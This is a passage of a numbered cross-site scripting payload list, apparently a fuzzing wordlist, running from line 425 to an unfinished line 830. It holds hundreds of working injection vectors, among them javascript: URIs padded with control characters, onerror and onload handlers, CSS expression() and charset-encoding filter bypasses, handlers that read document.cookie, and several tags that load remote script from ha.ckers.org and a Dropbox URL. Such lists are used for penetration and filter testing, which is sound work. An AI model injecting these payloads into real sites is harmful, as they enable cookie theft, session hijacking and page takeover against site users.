  425. <a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  426. <a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  427. <a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  428. <a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  429. <a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  430. <a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  431. <a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  432. <a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  433. <a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  434. <a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  435. <a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  436. <a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a>
  437. <a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  438. <a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  439. <a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
  440. <a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a>
  441. <a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a>
  442. <a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a>
  443. <a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a>
  444. <a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a>
  445. `"'><img src=xxx:x \x0Aonerror=javascript:alert(1)>
  446. `"'><img src=xxx:x \x22onerror=javascript:alert(1)>
  447. `"'><img src=xxx:x \x0Bonerror=javascript:alert(1)>
  448. `"'><img src=xxx:x \x0Donerror=javascript:alert(1)>
  449. `"'><img src=xxx:x \x2Fonerror=javascript:alert(1)>
  450. `"'><img src=xxx:x \x09onerror=javascript:alert(1)>
  451. `"'><img src=xxx:x \x0Conerror=javascript:alert(1)>
  452. `"'><img src=xxx:x \x00onerror=javascript:alert(1)>
  453. `"'><img src=xxx:x \x27onerror=javascript:alert(1)>
  454. `"'><img src=xxx:x \x20onerror=javascript:alert(1)>
  455. "`'><script>\x3Bjavascript:alert(1)</script>
  456. "`'><script>\x0Djavascript:alert(1)</script>
  457. "`'><script>\xEF\xBB\xBFjavascript:alert(1)</script>
  458. "`'><script>\xE2\x80\x81javascript:alert(1)</script>
  459. "`'><script>\xE2\x80\x84javascript:alert(1)</script>
  460. "`'><script>\xE3\x80\x80javascript:alert(1)</script>
  461. "`'><script>\x09javascript:alert(1)</script>
  462. "`'><script>\xE2\x80\x89javascript:alert(1)</script>
  463. "`'><script>\xE2\x80\x85javascript:alert(1)</script>
  464. "`'><script>\xE2\x80\x88javascript:alert(1)</script>
  465. "`'><script>\x00javascript:alert(1)</script>
  466. "`'><script>\xE2\x80\xA8javascript:alert(1)</script>
  467. "`'><script>\xE2\x80\x8Ajavascript:alert(1)</script>
  468. "`'><script>\xE1\x9A\x80javascript:alert(1)</script>
  469. "`'><script>\x0Cjavascript:alert(1)</script>
  470. "`'><script>\x2Bjavascript:alert(1)</script>
  471. "`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script>
  472. "`'><script>-javascript:alert(1)</script>
  473. "`'><script>\x0Ajavascript:alert(1)</script>
  474. "`'><script>\xE2\x80\xAFjavascript:alert(1)</script>
  475. "`'><script>\x7Ejavascript:alert(1)</script>
  476. "`'><script>\xE2\x80\x87javascript:alert(1)</script>
  477. "`'><script>\xE2\x81\x9Fjavascript:alert(1)</script>
  478. "`'><script>\xE2\x80\xA9javascript:alert(1)</script>
  479. "`'><script>\xC2\x85javascript:alert(1)</script>
  480. "`'><script>\xEF\xBF\xAEjavascript:alert(1)</script>
  481. "`'><script>\xE2\x80\x83javascript:alert(1)</script>
  482. "`'><script>\xE2\x80\x8Bjavascript:alert(1)</script>
  483. "`'><script>\xEF\xBF\xBEjavascript:alert(1)</script>
  484. "`'><script>\xE2\x80\x80javascript:alert(1)</script>
  485. "`'><script>\x21javascript:alert(1)</script>
  486. "`'><script>\xE2\x80\x82javascript:alert(1)</script>
  487. "`'><script>\xE2\x80\x86javascript:alert(1)</script>
  488. "`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script>
  489. "`'><script>\x0Bjavascript:alert(1)</script>
  490. "`'><script>\x20javascript:alert(1)</script>
  491. "`'><script>\xC2\xA0javascript:alert(1)</script>
  492. "/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x />
  493. "/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x />
  494. "/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x />
  495. "/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x />
  496. "/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x />
  497. "/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x />
  498. "/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x />
  499. "/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x />
  500. "/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x />
  501. <script\x2F>javascript:alert(1)</script>
  502. <script\x20>javascript:alert(1)</script>
  503. <script\x0D>javascript:alert(1)</script>
  504. <script\x0A>javascript:alert(1)</script>
  505. <script\x0C>javascript:alert(1)</script>
  506. <script\x00>javascript:alert(1)</script>
  507. <script\x09>javascript:alert(1)</script>
  508. "><img src=x onerror=javascript:alert(1)>
  509. "><img src=x onerror=javascript:alert('1')>
  510. "><img src=x onerror=javascript:alert("1")>
  511. "><img src=x onerror=javascript:alert(`1`)>
  512. "><img src=x onerror=javascript:alert(('1'))>
  513. "><img src=x onerror=javascript:alert(("1"))>
  514. "><img src=x onerror=javascript:alert((`1`))>
  515. "><img src=x onerror=javascript:alert(A)>
  516. "><img src=x onerror=javascript:alert((A))>
  517. "><img src=x onerror=javascript:alert(('A'))>
  518. "><img src=x onerror=javascript:alert('A')>
  519. "><img src=x onerror=javascript:alert(("A"))>

  520. "><img src=x onerror=javascript:alert("A")>
  521. "><img src=x onerror=javascript:alert((`A`))>

  522. "><img src=x onerror=javascript:alert(`A`)>

  523. `"'><img src=xxx:x onerror\x0B=javascript:alert(1)>
  524. `"'><img src=xxx:x onerror\x00=javascript:alert(1)>
  525. `"'><img src=xxx:x onerror\x0C=javascript:alert(1)>
  526. `"'><img src=xxx:x onerror\x0D=javascript:alert(1)>
  527. `"'><img src=xxx:x onerror\x20=javascript:alert(1)>
  528. `"'><img src=xxx:x onerror\x0A=javascript:alert(1)>
  529. `"'><img src=xxx:x onerror\x09=javascript:alert(1)>
  530. <script>javascript:alert(1)<\x00/script>
  531. <img src=# onerror\x3D"javascript:alert(1)" >
  532. <input onfocus=javascript:alert(1) autofocus>
  533. <input onblur=javascript:alert(1) autofocus><input autofocus>
  534. <video poster=javascript:javascript:alert(1)//
  535. <body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
  536. <form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X
  537. <video><source onerror="javascript:javascript:alert(1)">
  538. <video onerror="javascript:javascript:alert(1)"><source>
  539. <form><button formaction="javascript:javascript:alert(1)">X
  540. <body oninput=javascript:alert(1)><input autofocus>
  541. <math href="javascript:javascript:alert(1)">CLICKME</math>  <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>
  542. <frameset onload=javascript:alert(1)>
  543. <table background="javascript:javascript:alert(1)">
  544. <!--<img src="--><img src=x onerror=javascript:alert(1)//">
  545. <comment><img src="</comment><img src=x onerror=javascript:alert(1))//">
  546. <![><img src="]><img src=x onerror=javascript:alert(1)//">
  547. <style><img src="</style><img src=x onerror=javascript:alert(1)//">
  548. <li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div>
  549. <head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body>
  550. <SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT>
  551. <OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>
  552. <object data="data:text/html;base64,%(base64)s">
  553. <embed src="data:text/html;base64,%(base64)s">
  554. <b <script>alert(1)</script>0
  555. <div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>
  556. <x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'>
  557. <embed src="javascript:alert(1)">
  558. <img src="javascript:alert(1)">
  559. <image src="javascript:alert(1)">
  560. <script src="javascript:alert(1)">
  561. <div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x
  562. <? foo="><script>javascript:alert(1)</script>">
  563. <! foo="><script>javascript:alert(1)</script>">
  564. </ foo="><script>javascript:alert(1)</script>">
  565. <? foo="><x foo='?><script>javascript:alert(1)</script>'>">
  566. <! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>">
  567. <% foo><x foo="%><script>javascript:alert(1)</script>">
  568. <div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script>
  569. <img \x00src=x onerror="alert(1)">
  570. <img \x47src=x onerror="javascript:alert(1)">
  571. <img \x11src=x onerror="javascript:alert(1)">
  572. <img \x12src=x onerror="javascript:alert(1)">
  573. <img\x47src=x onerror="javascript:alert(1)">
  574. <img\x10src=x onerror="javascript:alert(1)">
  575. <img\x13src=x onerror="javascript:alert(1)">
  576. <img\x32src=x onerror="javascript:alert(1)">
  577. <img\x47src=x onerror="javascript:alert(1)">
  578. <img\x11src=x onerror="javascript:alert(1)">
  579. <img \x47src=x onerror="javascript:alert(1)">
  580. <img \x34src=x onerror="javascript:alert(1)">
  581. <img \x39src=x onerror="javascript:alert(1)">
  582. <img \x00src=x onerror="javascript:alert(1)">
  583. <img src\x09=x onerror="javascript:alert(1)">
  584. <img src\x10=x onerror="javascript:alert(1)">
  585. <img src\x13=x onerror="javascript:alert(1)">
  586. <img src\x32=x onerror="javascript:alert(1)">
  587. <img src\x12=x onerror="javascript:alert(1)">
  588. <img src\x11=x onerror="javascript:alert(1)">
  589. <img src\x00=x onerror="javascript:alert(1)">
  590. <img src\x47=x onerror="javascript:alert(1)">
  591. <img src=x\x09onerror="javascript:alert(1)">
  592. <img src=x\x10onerror="javascript:alert(1)">
  593. <img src=x\x11onerror="javascript:alert(1)">
  594. <img src=x\x12onerror="javascript:alert(1)">
  595. <img src=x\x13onerror="javascript:alert(1)">
  596. <img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)">
  597. <img src=x onerror=\x09"javascript:alert(1)">
  598. <img src=x onerror=\x10"javascript:alert(1)">
  599. <img src=x onerror=\x11"javascript:alert(1)">
  600. <img src=x onerror=\x12"javascript:alert(1)">
  601. <img src=x onerror=\x32"javascript:alert(1)">
  602. <img src=x onerror=\x00"javascript:alert(1)">
  603. <a href=java script:javascript:alert(1)>XXX</a>
  604. <img src="x` `<script>javascript:alert(1)</script>"` `>
  605. <img src onerror /" '"= alt=javascript:alert(1)//">
  606. <title onpropertychange=javascript:alert(1)></title><title title=>
  607. <a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>">
  608. <!--[if]><script>javascript:alert(1)</script -->
  609. <!--[if<img src=x onerror=javascript:alert(1)//]> -->
  610. <script src="/\%(jscript)s"></script>
  611. <script src="\\%(jscript)s"></script>
  612. <object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object>
  613. <a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X
  614. <style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style>
  615. <link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d
  616. <style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style>
  617. <a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">XXX</a></a><a href="javascript:javascript:alert(1)">XXX</a>
  618. <style>*[{}@import'%(css)s?]</style>X
  619. <div style="font-family:'foo
  620. ;color:red;';">XXX
  621. <div style="font-family:foo}color=red;">XXX
  622. <// style=x:expression\28javascript:alert(1)\29>
  623. <style>*{x:expression(javascript:alert(1))}</style>
  624. <div style=content:url(%(svg)s)></div>
  625. <div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X
  626. <div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script>
  627. <div style="background:url(/f#oo/;color:red/*/foo.jpg);">X
  628. <div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X
  629. <div id="x">XXX</div> <style>  #x{font-family:foo[bar;color:green;}  #y];color:red;{}  </style>
  630. <x style="background:url('x;color:red;/*')">XXX</x>
  631. <script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script>
  632. <script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script>
  633. <script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script>
  634. <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script>
  635. <meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
  636. <meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
  637. <meta charset="mac-farsi">&#188;script&#190;javascript:alert(1)&#188;/script&#190;
  638. X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` >
  639. 1<set/xmlns=`urn:schemas-microsoft-com:time` style=`behAvior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=javascript:alert(1)>`>
  640. 1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=javascript:alert(1)>>
  641. <vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe>
  642. 1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>
  643. <a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a>
  644. <x style="behavior:url(%(sct)s)">
  645. <xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label>
  646. <event-source src="%(event)s" onload="javascript:alert(1)">
  647. <a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A">
  648. <div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="<img src=x:x onerror =javascript:alert(1)>">
  649. <script>%(payload)s</script>
  650. <script src=%(jscript)s></script>
  651. <script language='javascript' src='%(jscript)s'></script>
  652. <script>javascript:alert(1)</script>
  653. <IMG SRC="javascript:javascript:alert(1);">
  654. <IMG SRC=javascript:javascript:alert(1)>
  655. <IMG SRC=`javascript:javascript:alert(1)`>
  656. <SCRIPT SRC=%(jscript)s?<B>
  657. <FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET>
  658. <BODY ONLOAD=javascript:alert(1)>
  659. <BODY ONLOAD=javascript:javascript:alert(1)>
  660. <IMG SRC="jav ascript:javascript:alert(1);">
  661. <BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)>
  662. <SCRIPT/SRC="%(jscript)s"></SCRIPT>
  663. <<SCRIPT>%(payload)s//<</SCRIPT>
  664. <IMG SRC="javascript:javascript:alert(1)"
  665. <iframe src=%(scriptlet)s <
  666. <INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);">
  667. <IMG DYNSRC="javascript:javascript:alert(1)">
  668. <IMG LOWSRC="javascript:javascript:alert(1)">
  669. <BGSOUND SRC="javascript:javascript:alert(1);">
  670. <BR SIZE="&{javascript:alert(1)}">
  671. <LAYER SRC="%(scriptlet)s"></LAYER>
  672. <LINK REL="stylesheet" HREF="javascript:javascript:alert(1);">
  673. <STYLE>@import'%(css)s';</STYLE>
  674. <META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet">
  675. <XSS STYLE="behavior: url(%(htc)s);">
  676. <STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS
  677. <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);">
  678. <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);">
  679. <IFRAME SRC="javascript:javascript:alert(1);"></IFRAME>
  680. <TABLE BACKGROUND="javascript:javascript:alert(1)">
  681. <TABLE><TD BACKGROUND="javascript:javascript:alert(1)">
  682. <DIV STYLE="background-image: url(javascript:javascript:alert(1))">
  683. <DIV STYLE="width:expression(javascript:alert(1));">
  684. <IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))">
  685. <XSS STYLE="xss:expression(javascript:alert(1))">
  686. <STYLE TYPE="text/javascript">javascript:alert(1);</STYLE>
  687. <STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A>
  688. <STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE>
  689. <!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]-->
  690. <BASE HREF="javascript:javascript:alert(1);//">
  691. <OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT>
  692. <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT>
  693. <HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:javascript:alert(1)"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
  694. <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>javascript:alert(1)</SCRIPT>"></BODY></HTML>
  695. <SCRIPT SRC="%(jpg)s"></SCRIPT>
  696. <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-
  697. <form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X
  698. <body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
  699. <P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)">
  700. <STYLE>@import'%(css)s';</STYLE>
  701. <STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE>
  702. <meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&>
  703. <SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT>
  704. <style onreadystatechange=javascript:javascript:alert(1);></style>
  705. <?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html>
  706. <embed code=%(scriptlet)s></embed>
  707. <embed code=javascript:javascript:alert(1);></embed>
  708. <embed src=%(jscript)s></embed>
  709. <frameset onload=javascript:javascript:alert(1)></frameset>
  710. <object onerror=javascript:javascript:alert(1)>
  711. <embed type="image" src=%(scriptlet)s></embed>
  712. <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml>
  713. <IMG SRC=&{javascript:alert(1);};>
  714. <a href="javAascript:javascript:alert(1)">test1</a>
  715. <a href="javaascript:javascript:alert(1)">test1</a>
  716. <embed width=500 height=500 code="data:text/html,<script>%(payload)s</script>"></embed>
  717. <iframe srcdoc="<iframe/srcdoc=&lt;img/src=&apos;&apos;onerror=javascript:alert(1)&gt;>">
  718. ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
  719. alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
  720. ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
  721. '';!--"<XSS>=&{()}
  722. <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
  723. <IMG SRC="javascript:alert('XSS');">
  724. <IMG SRC=javascript:alert('XSS')>
  725. <IMG SRC=JaVaScRiPt:alert('XSS')>
  726. <IMG SRC=javascript:alert("XSS")>
  727. <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
  728. <a onmouseover="alert(document.cookie)">xxs link</a>
  729. <a onmouseover=alert(document.cookie)>xxs link</a>
  730. <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
  731. <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
  732. <IMG SRC=# onmouseover="alert('xxs')">
  733. <IMG SRC= onmouseover="alert('xxs')">
  734. <IMG onmouseover="alert('xxs')">
  735. <IMG SRC=javascript:alert('XSS')>
  736. <IMG SRC=javascript:alert('XSS')>
  737. <IMG SRC=javascript:alert('XSS')>
  738. <IMG SRC="jav ascript:alert('XSS');">
  739. <IMG SRC="jav        ascript:alert('XSS');">
  740. <IMG SRC="jav
  741. ascript:alert('XSS');">
  742. <IMG SRC="jav
  743. ascript:alert('XSS');">
  744. perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";' > out
  745. <IMG SRC="   javascript:alert('XSS');">
  746. <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  747. <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
  748. <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  749. <<SCRIPT>alert("XSS");//<</SCRIPT>
  750. <SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
  751. <SCRIPT SRC=//ha.ckers.org/.j>
  752. <IMG SRC="javascript:alert('XSS')"
  753. <iframe src=http://ha.ckers.org/scriptlet.html <
  754. ";alert('XSS');//
  755. </TITLE><SCRIPT>alert("XSS");</SCRIPT>
  756. <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
  757. <BODY BACKGROUND="javascript:alert('XSS')">
  758. <IMG DYNSRC="javascript:alert('XSS')">
  759. <IMG LOWSRC="javascript:alert('XSS')">
  760. <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
  761. <IMG SRC='vbscript:msgbox("XSS")'>
  762. <IMG SRC="livescript:[code]">
  763. <BODY ONLOAD=alert('XSS')>
  764. <BGSOUND SRC="javascript:alert('XSS');">
  765. <BR SIZE="&{alert('XSS')}">
  766. <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
  767. <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
  768. <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
  769. <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
  770. <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
  771. <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
  772. <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
  773. exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
  774. <STYLE TYPE="text/javascript">alert('XSS');</STYLE>
  775. <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
  776. <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
  777. <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
  778. <XSS STYLE="xss:expression(alert('XSS'))">
  779. <XSS STYLE="behavior: url(xss.htc);">
  780. &#188;script&#190;alert(¢XSS¢)&#188;/script&#190;
  781. <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
  782. <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
  783. <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
  784. <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
  785. <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
  786. <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
  787. <TABLE BACKGROUND="javascript:alert('XSS')">
  788. <TABLE><TD BACKGROUND="javascript:alert('XSS')">
  789. <DIV STYLE="background-image: url(javascript:alert('XSS'))">
  790. <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
  791. <DIV STYLE="background-image: url(javascript:alert('XSS'))">
  792. <DIV STYLE="width: expression(alert('XSS'));">
  793. <BASE HREF="javascript:alert('XSS');//">
  794. <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
  795. <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
  796. <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
  797. <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->
  798. <? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
  799. <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
  800. Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
  801. <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
  802. <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
  803. <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  804. <SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  805. <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  806. <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  807. <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  808. <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  809. <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  810. <A HREF="http://66.102.7.147/">XSS</A>
  811. <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
  812. <A HREF="http://1113982867/">XSS</A>
  813. <A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
  814. <A HREF="http://0102.0146.0007.00000223/">XSS</A>
  815. <A HREF="htt p://6 6.000146.0x7.147/">XSS</A>
  816. <iframe  src="        javascript:prompt(1)        ">
  817. <svg><style>{font-family:'<iframe/onload=confirm(1)>'
  818. <input/onmouseover="javaSCRIPT:confirm(1)"
  819. <sVg><scRipt >alert(1) {Opera}
  820. <img/src=`` onerror=this.onerror=confirm(1)
  821. <form><isindex formaction="javascript:confirm(1)"
  822. <img src=``
  823. onerror=alert(1)

  824. <script/         src='https://dl.dropbox.com/u/13018058/js.js' /        ></script>
  825. <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
  826. <iframe/src="data:text/html;        base64        ,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
  827. <script /**/>/**/alert(1)/**/</script /**/
  828. "><h1/onmouseover='\u0061lert(1)'>
  829. <iframe/src="data:text/html,<svg onload=alert(1)>">
  830. <meta content="
